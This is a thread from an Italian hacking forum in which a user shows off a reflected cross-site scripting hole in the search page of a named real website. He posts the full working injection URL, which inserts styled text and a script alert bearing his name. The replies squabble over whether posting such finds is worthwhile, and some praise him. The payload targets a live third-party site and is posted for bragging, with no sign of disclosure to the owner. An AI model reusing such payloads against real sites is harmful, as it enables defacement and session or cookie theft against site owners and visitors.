• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Release XSS in http://www.easyinfo.co.za - uno dei siti inglesi più visitati

TheAngel

Utente bannato
Autore del topic
19 Ottobre 2009
273
0
Miglior risposta
0
Mi sono fatto un giretto su qualke sito per postare qualke XSS e guardate cosa è saltato fuori :soso:
Perfavore, Entra oppure Registrati per vedere i Link!
un sito Mooolto famoso per gli inglesi :emoji_smiley:

Questo è l'XSS:
Screen:
sxfwqa.png

b8lcm0.png

262s1zo.png
http://www.easyinfo.co.za/search.php?query=%22%3E%3Cbr%3E%3Cfont%20color=Blue%20size=10%3EXSS%20by%20TheAngel%20%3C/font%3E%3Cfont%20color=brown%20size=10%3E%20AsD%3C/font%3E%3Cbr%3E%3Cbr%3E%3Cfont%20color=red%20size=10%3ETheAngel%20Ha%20fatto%20un%20giretto%3C/font%3E%3Cbr%3E%3Cbr%3E%3Cfont%20color=white%3E%3Cscript%3Ealert%28%27Xss%20by%20TheAngel%27%29%3C/script%3E
Al prossimo Xss :emoji_relieved:
 
AAAAAAAAAAAAAAAAAAAAAA che nervoso! Le postano gli altri e fai i complimenti, le posto io e mi fai 2 ore di lagna.

Vabbè comunque bravo per l'xss
 
AAAAAAAAAAAAAAAAAAAAAA che nervoso! Le postano gli altri e fai i complimenti, le posto io e mi fai 2 ore di lagna.

Vabbè comunque bravo per l'xss
Lo faccio apposta *-* xD
Ma tu nè posti 700 °_°..bravi tutti quelli che le fanno,ma tanto se uno esegue le XSS e non sa neanche come funzionano ( mi riferisco in generale ).
Posso dire bravo a chiunque.

PS : Comunque ho anche scritto che è TOTALMENTE INUTILE effettuare XSS e postarle.
 
Ultima modifica:
Grazie per la tua precisione, e ripeto ancora una volta ANUBI ANUBI (cerca su google) le xss che ho postato io non erano firme ma discorsi simpatici, altrimenti se vorrei postarle tutte!!!! UUU!
 
Grazie per la tua precisione, e ripeto ancora una volta ANUBI ANUBI (cerca su google) le xss che ho postato io non erano firme ma discorsi simpatici, altrimenti se vorrei postarle tutte!!!! UUU!

Quando ero Mod avevo proposto una sezione apposita per postare immagini di XSS,SQL Injection ecc..ma dissero che lo ritenevano inutile,perciò le ritengo inutili.
 
Eri Mod, quindi credo che sai che state andando in OT >_> Comunque bravo TheAngel! ^^